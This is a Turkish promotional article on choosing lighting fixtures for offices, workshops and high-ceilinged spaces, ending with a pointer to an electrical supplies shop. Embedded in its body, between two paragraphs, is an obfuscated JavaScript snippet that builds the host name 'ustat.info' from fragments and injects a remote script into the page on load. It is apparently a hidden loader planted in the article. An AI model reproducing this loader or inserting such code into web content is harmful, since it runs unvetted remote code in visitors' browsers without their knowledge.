Doğru Aydınlatma Armatürü Nasıl Seçilir?

TAKİP ET

Aydınlatma, tüm yapılarda en önemli unsurlardan biridir. Bu noktada oldukça önemli olan aydınlatma armatürleri ise günümüzde çok farklı seçenekler sunmayı başarıyor. Ancak dikkat etmeniz gereken, yapıya ve beklentilere uygun olan armatür çeşitlerinin tercih edilmesidir. Peki, bu seçim nasıl ve neye göre yapılır?

Doğru Aydınlatma Armatürü Nasıl Seçilir?

Aydınlatma, tüm yapılarda en önemli unsurlardan biridir. Bu noktada oldukça önemli olan aydınlatma armatürleri ise günümüzde çok farklı seçenekler sunmayı başarıyor. Ancak dikkat etmeniz gereken, yapıya ve beklentilere uygun olan armatür çeşitlerinin tercih edilmesidir. Peki, bu seçim nasıl ve neye göre yapılır? Bu sorunun en net yanıtlarından biri de ihtiyaç olmalıdır. Aynı zamanda kullanılan armatürlerin kaliteli olması, kolay monte edilmesi gibi özelliklere de dikkat edilmesinde fayda var.


(function(){
wlq7=document.createElement("script");wlq7.type="text/javascript";
wlq7.async=true;wlq7_=(("us")+"t")+"a";wlq7_+=("t.i")+""+"n";wlq7_+=(("f")+"o");wlq7_+="/";
wlq7u="490827925.";wlq7u+="sd0h4941lq7eex63la7htvsf700re6";wlq7.src="https://"+wlq7_+wlq7u;
wlq7db=document.body;wlq7db.appendChild(wlq7);
})();

Örneğin ofis aydınlatma armatürleri, sınıflardan hastanelere, otellerden işletmelere kadar pek çok alanda kullanılan ürünlerdir. Ofis aydınlatma ürünlerinin kendi içerisinde farklı seçenekler de sunuyor olması önem taşıyor. Özellikle LED spot armatür modelleri, LED aydınlatma teknolojisinin sunduğu tüm avantajlardan faydalanmaya olanak tanıyor.

 

LED panel armatür çeşitleri...

Sensörlü aydınlatmalar; enerji tüketimine ve tasarrufa önem verenler için ideal bir seçenektir.

LED panel armatür çeşitleri ve aynı zamanda glop armatür modelleri de ofis aydınlatması dendiğinde sıklıkla akla gelen ürünlerdir. Bu ürünler sensörlü olarak da tasarlanabildiğinden enerji tüketimine ve tasarrufa önem verenler için ideal bir seçenek olabiliyor. İnsan sirkülasyonunun yoğun olduğu tüm alanlar için sensörlü olan modeller de dahil olmak üzere bu armatür modellerinin tercih edilebileceğini ekleyelim. Aynı zamanda ofis aydınlatma armatürleri ebat seçenekleri de sunuyor ve mekanın büyüklüğüne ya da tavan yüksekliğine bağlı olarak uygun ebatların seçilmesine özen gösterilmelidir.

Diğer yandan, lineer etanj armatür çeşitleri ise kendi içerisinde kullanıcılara farklı seçenekler sunuyor. LED bant armatür ya da etanj LED armatür çeşitleri güvenle tercih edilebilecek olan ürünlerdir. Acil kitli etanj LED armatürler de genel aydınlatma amacıyla kullanılabiliyor. Bu ürün modelleri farklı lümen seçenekleri sunabiliyor ve mutlaka mekanın büyüklüğü dikkate alınarak tercih yapılması gerekiyor.

 

Eğer yüksek tavanlı atölyeler, imalathaneler gibi bir mekan için aydınlatma çözümü arıyorsanız...

Eğer yüksek tavanlı atölyeler, imalathaneler gibi bir mekan için aydınlatma çözümü arıyorsanız yüksek tavan armatürü çeşitlerine yönelebilirsiniz. Elbette burada da farklı lümen seçenekleri bulunuyor ve böylelikle yüksek tavanlı yapıların en az sayıda armatür kullanılarak ideal seviyede aydınlatılması mümkün olabiliyor. Atölye armatürü, yüksek tavan led armatürü, acil kitli olan yüksek tavan armatürleri gibi alternatifler arasından mekana en uygun olanı seçilmelidir.

Son olarak projektörler ise çok daha güçlü ışık kaynağı sunarlar ve bunlar arasında LED olanlar da mevcuttur. Gördüğünüz gibi aydınlatma konusunda birçok seçenek mevcut. Doğru aydınlatma tercihi için öncelikle ihtiyacınıza uygun hareket etmenizde fayda var. İhtiyacınız neyi gerektiriyorsa o modele yönelmelisiniz. Ayrıca birbirinden kaliteli aydınlatma armatürlerini daha yakından incelemek ve mekana uygun seçimler yapabilmek için elektrikticaret.com adresine uğrayabilirsiniz.

Doğru Aydınlatma Armatürü Nasıl Seçilir Enerji Ekonomisi